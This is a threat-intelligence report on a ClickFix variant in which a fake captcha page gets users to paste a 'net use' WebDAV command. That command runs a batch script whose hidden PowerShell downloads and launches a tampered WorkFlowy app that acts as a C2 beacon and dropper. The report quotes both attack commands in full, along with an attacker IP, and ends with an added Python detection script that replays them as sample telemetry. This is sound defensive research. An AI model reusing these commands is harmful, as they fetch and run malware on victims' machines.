Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.

Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield

Summary

Atos researchers identified a new variant of the popular ClickFix technique, in which attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command maps a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it, and launches the legitimate WorkFlowy application with modified, malicious logic hidden inside its “.asar” archive. This acts as a C2 beacon and as a dropper for the final malware payload.

Figure 1: High-level overview of attack flow.

Attack overview

In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, “happyglamper[.]ro”. It prompts the user to open the Run dialog via “Win+R”, then press “Ctrl+V” and “Enter”.

Figure 2: Phishing website 1
Figure 3: Phishing website 2

This executes the following command:

"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, “net use” is used to map and connect to a network drive on an external server, from which a batch script is executed. While not novel, these TTPs had not been seen in ClickFix attacks before. Combined with the uncommon later stages of the infection chain, this gives the adversaries a high chance of evading defensive controls and staying under the radar of defenders.

In this case, the observed ClickFix variant successfully bypassed detection by Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service, which focuses on the main behavioral aspect of the ClickFix technique: initial execution through the RunMRU registry key (hunting query available in the Appendix section).

The initial execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of “update.cmd”:

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\";
Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force;
Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

This spawns a…
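Detection logic for both stages of the chain described above (the RunMRU-based hunt, the “net use” WebDAV mapping with a .cmd run from the mapped drive, and the hidden PowerShell download/unpack/launch in update.cmd), as an added example. It is not part of the Atos report and is not the appendix hunting query. Assumptions: RunMRU values are taken to carry a trailing "\1" marker after the typed command; the rule patterns are derived from the observed commands; the sample registry entries and process command lines are constructed, with the documentation address 203.0.113.10 standing in for the real server.

```python
"""ClickFix (net use / WebDAV variant) detection over RunMRU entries and process command lines.

Added example, not code from the Atos report. Rule patterns and sample
telemetry are assumptions constructed from the behaviour the report describes.
"""
import re

# --- Stage 1: "net use" against a WebDAV target, then a script run from the mapped drive ---
NET_USE_WEBDAV = re.compile(
    r"net\s+use\s+(?P<drive>[a-z]):\s+"
    r"(?P<target>https?://\S+|\\\\[^\s\\]+@(?:ssl@)?\d+\S*)",  # http://host/path or \\host@80\path
    re.IGNORECASE,
)
EXEC_FROM_DRIVE = re.compile(r'(?P<drive>[a-z]):\\[^\s"]*\.(?:cmd|bat)\b', re.IGNORECASE)
NET_USE_DELETE = re.compile(r"net\s+use\s+[a-z]:\s+/delete", re.IGNORECASE)

# --- Stage 2: hidden PowerShell that downloads, unpacks and launches from a user-writable path ---
PS_HIDDEN = re.compile(r"-w\S*\s+hidden", re.IGNORECASE)          # -WindowStyle Hidden, -w hidden
PS_DOWNLOAD = re.compile(r"\b(?:invoke-webrequest|iwr)\b", re.IGNORECASE)
PS_EXPAND = re.compile(r"\bexpand-archive\b", re.IGNORECASE)
PS_START = re.compile(r"\bstart-process\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\$env:(?:temp|localappdata|appdata)\b", re.IGNORECASE)

PS_INDICATORS = (
    ("ps_hidden_window", PS_HIDDEN),
    ("ps_download", PS_DOWNLOAD),
    ("ps_expand_archive", PS_EXPAND),
    ("ps_start_process", PS_START),
    ("ps_user_writable_path", USER_WRITABLE),
)


def classify(cmdline: str) -> list[str]:
    """Return the names of every indicator matched by one command line."""
    hits: list[str] = []
    m = NET_USE_WEBDAV.search(cmdline)
    if m:
        hits.append("net_use_webdav")
        e = EXEC_FROM_DRIVE.search(cmdline)
        # Only count the script if it runs from the very drive letter that was just mapped.
        if e and e.group("drive").lower() == m.group("drive").lower():
            hits.append("exec_script_from_mapped_drive")
        if NET_USE_DELETE.search(cmdline):
            hits.append("mapped_drive_deleted_inline")
    hits.extend(name for name, rx in PS_INDICATORS if rx.search(cmdline))
    return hits


def verdict(cmdline: str) -> str:
    """Collapse the matched indicators into one label per command line."""
    hits = set(classify(cmdline))
    if {"net_use_webdav", "exec_script_from_mapped_drive"} <= hits:
        return "clickfix_stage1_webdav_netuse"
    if {"ps_download", "ps_start_process", "ps_user_writable_path"} <= hits:
        return "clickfix_stage2_ps_dropper"
    return "benign"


def runmru_commands(entries: dict[str, str]) -> list[str]:
    """Turn raw RunMRU values into command lines: skip the MRUList ordering value
    and strip the trailing "\\1" marker (assumed value format)."""
    cmds = []
    for name, value in entries.items():
        if name == "MRUList":
            continue
        cmds.append(value[:-2] if value.endswith("\\1") else value)
    return cmds


def hunt(runmru: dict[str, str], cmdlines: list[str]) -> list[tuple[str, str]]:
    """Return (command, label) for every non-benign command from both telemetry sources."""
    found = []
    for cmd in runmru_commands(runmru) + cmdlines:
        label = verdict(cmd)
        if label != "benign":
            found.append((cmd, label))
    return found


# Constructed sample telemetry (not data from the report); 203.0.113.10 is a documentation address.
SAMPLE_RUNMRU = {
    "MRUList": "bac",
    "a": "notepad\\1",
    "b": '"cmd.exe" /c net use Z: http://203.0.113.10/webdav /persistent:no '
         '&& "Z:\\update.cmd" & net use Z: /delete\\1',
    "c": "calc.exe\\1",
}
SAMPLE_CMDLINES = [
    'powershell -WindowStyle Hidden -Command "Invoke-WebRequest '
    "'http://203.0.113.10/flowy.zip' -OutFile \"$env:TEMP\\dl.zip\"; "
    'Expand-Archive "$env:TEMP\\dl.zip" -DestinationPath "$env:LOCALAPPDATA\\MyApp" -Force; '
    'Start-Process "$env:LOCALAPPDATA\\MyApp\\WorkFlowy.exe""',
    "net use Z: \\\\fileserver\\share /persistent:yes",          # ordinary SMB mapping, no execution
    'powershell -Command "Get-ChildItem $env:USERPROFILE"',      # ordinary scripting
]

if __name__ == "__main__":
    for cmd, label in hunt(SAMPLE_RUNMRU, SAMPLE_CMDLINES):
        print(f"{label}: {cmd[:80]}")
```

The stage-one rule deliberately requires the script to run from the same drive letter that the “net use” just mapped, so routine SMB mappings to internal file servers and unrelated scripts do not fire; the inline “/delete” and the hidden-window flag are recorded as supporting indicators only, since an attacker can drop either without changing the behaviour that matters.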

Last Update: March 13, 2026